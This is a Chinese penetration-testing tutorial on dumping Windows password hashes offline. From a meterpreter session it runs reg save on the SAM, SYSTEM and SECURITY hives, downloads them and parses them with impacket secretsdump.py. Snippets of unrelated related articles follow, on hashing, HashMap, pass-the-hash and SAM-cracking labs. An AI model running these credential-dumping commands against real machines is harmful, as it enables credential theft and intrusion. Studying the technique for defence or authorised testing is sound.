离线提取目标机hash

0x01 前言

很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。

在meterpreter shell命令切到交互式cmd命令。

0x02 过程

reg save 方式使得需要下载的目标机

Ps:reg save将指定子项、项的注册表值的副本保存到指定文件中

我们需要导出的hash文件

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

在meterpreter中使用shell命令来到交互式cmd

这样在c盘下就导出了三个注册表文件

返回meterpreter,使用meterpreter下自带download功能来将目标机的三个注册表文件下载到攻击机

下载好了后我们需要读取目标的hash

用到的工具是impacket的 secretsdump.py。Kali默认路径:

/root/impacket/examples/secretsdump.py

Ps:Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 

 

 

命令如下:

python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

原文地址:https://www.cnblogs.com/-qing-/p/10742450.html

时间: 2024-10-21 08:17:53

离线提取目标机hash的相关文章

离线提取域控HASH的方法

1.注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可. reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security secruity.hive 本地获取 #如果要提取明文,请修改注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\Secur

分布式memcached学习(四)—— 一致性hash算法原理

    分布式一致性hash算法简介 当你看到"分布式一致性hash算法"这个词时,第一时间可能会问,什么是分布式,什么是一致性,hash又是什么.在分析分布式一致性hash算法原理之前,我们先来了解一下这几个概念. 分布式 分布式(distributed)是指在多台不同的服务器中部署不同的服务模块,通过远程调用协同工作,对外提供服务. 以一个航班订票系统为例,这个航班订票系统有航班预定.网上值机.旅客信息管理.订单管理.运价计算等服务模块.现在要以集中式(集群,cluster)和分布

使用hashMap实现并发

承认有些标题党味道,但却在实际异步框架中使用了. 比起“公认”concurrentHashMap方式,提高有3-4倍的性能以及更低cpu占有率 需求 异步框架需要一个buffer,存放请求数据,多线程共享. 显然这是一个多线程并发问题. 同步锁方案 开始小觑了问题,以为只是简单地锁住资源.插入请求对象,都是内存操作,时间短,即使“堵”也不严重. private void multiThreadSyncLock(final int numofThread,final Map<String,Stri

2016年4月11号渗透总结

今天又学了几个提权的方法. 1.getpass提权,去网上下载getpass工具,拿到网站的webshell后把这个工具上传上去,然后调用cmd来执行这个程序,管理员的账号和密码就会显示出来,很强大的一款工具,但是主机如果是安装的盗版系统,这个工具有时候就会失效. 2.hash传递入侵,这个入侵就需要用到有名的工具metasploit了,这个工具有windows和linux两个版本,可以去官网上下载.步骤如下: 启动msf msfconsole use exploit/windows/smb/p

Windows口令安全与破解之--LC4破解本地SAM散列

[实验目的] 1)理解LC4破解本地SAM散列的原理 2)学习LC4破解本地SAM散列的过程 [实验原理] Windows hash由二部分组成,分别是LM HASH&NT HASH.Windows系统关于hash的组成如下: 用户名称:`RID:LM-HASH值:NT-HASH值` LM HASH生成规则: 1.用户的密码被限制为最多14个字符. 2.用户的密码转换为大写. 3.系统中用户的密码编码使用了OEM内码页 4.密码不足14字节将会用0来补全. 5.固定长度的密码被分成两个7byte

Windows口令安全与破解之--saminside破解本地sam散列

[实验目的] 1)理解saminside破解本地sam散列的原理 2)学习psaminside破解本地sam散列的过程 [实验原理] Windows hash由二部分组成,分别是LM HASH&NT HASH.Windows系统关于hash的组成如下: 用户名称:`RID:LM-HASH值:NT-HASH值` LM HASH生成规则: 1.用户的密码被限制为最多14个字符. 2.用户的密码转换为大写. 3.系统中用户的密码编码使用了OEM内码页 4.密码不足14字节将会用0来补全. 5.固定长度

Windows口令安全与破解之--Opcrack挂彩虹表破解本地sam散列

[实验目的] 1)理解Opcrack挂彩虹表破解本地sam散列的原理 2)学习Opcrack挂彩虹表破解本地sam散列的过程 [实验原理] 彩虹表是一个用于加密散列函数逆运算的预先计算好的表, 常用于破解加密过的密码散列.一般主流的彩虹表都在100G以上. 查找表常常用于包含有限字符固定长度纯文本密码的加密.这是以空间换时间的典型实践, 在每一次尝试都计算的暴力破解中使用更少的计算能力和更多的储存空间,但却比简单的每个输入一条散列的翻查表使用更少的储存空间和更多的计算性能.使用加盐的KDF函数可

区块链~Merkle Tree(默克尔树)算法解析~转载

转载~Merkle Tree(默克尔树)算法解析 /*最近在看Ethereum,其中一个重要的概念是Merkle Tree,以前从来没有听说过,所以查了些资料,学习了Merkle Tree的知识,因为接触时间不长,对Merkle Tree的理解也不是很深入,如果有不对的地方,希望各位大神指正*/ Merkle Tree概念 Merkle Tree,通常也被称作Hash Tree,顾名思义,就是存储hash值的一棵树.Merkle树的叶子是数据块(例如,文件或者文件的集合)的hash值.非叶节点是

基于BP神经网络的手写数字识别

一.BP神经网络原理及结构 本部分先介绍神经网络基本单元神经元的结构和作用,再主要介绍BP神经网络的结构和原理. 1.神经元 神经元作为神经网络的基本单元,对于外界输入具有简单的反应能力,在数学上表征为简单的函数映射.如下图是一个神经元的基本结构,  神经元结构 图中是神经元的输入,是神经元输入的权重,是神经元的激活函数,y是神经元的输出,其函数映射关系为 激活函数来描述层与层输出之间的关系,从而模拟各层神经元之间的交互反应.激活函数必须满足处处可导的条件.常用的神经元函数有四种,分别是线性函数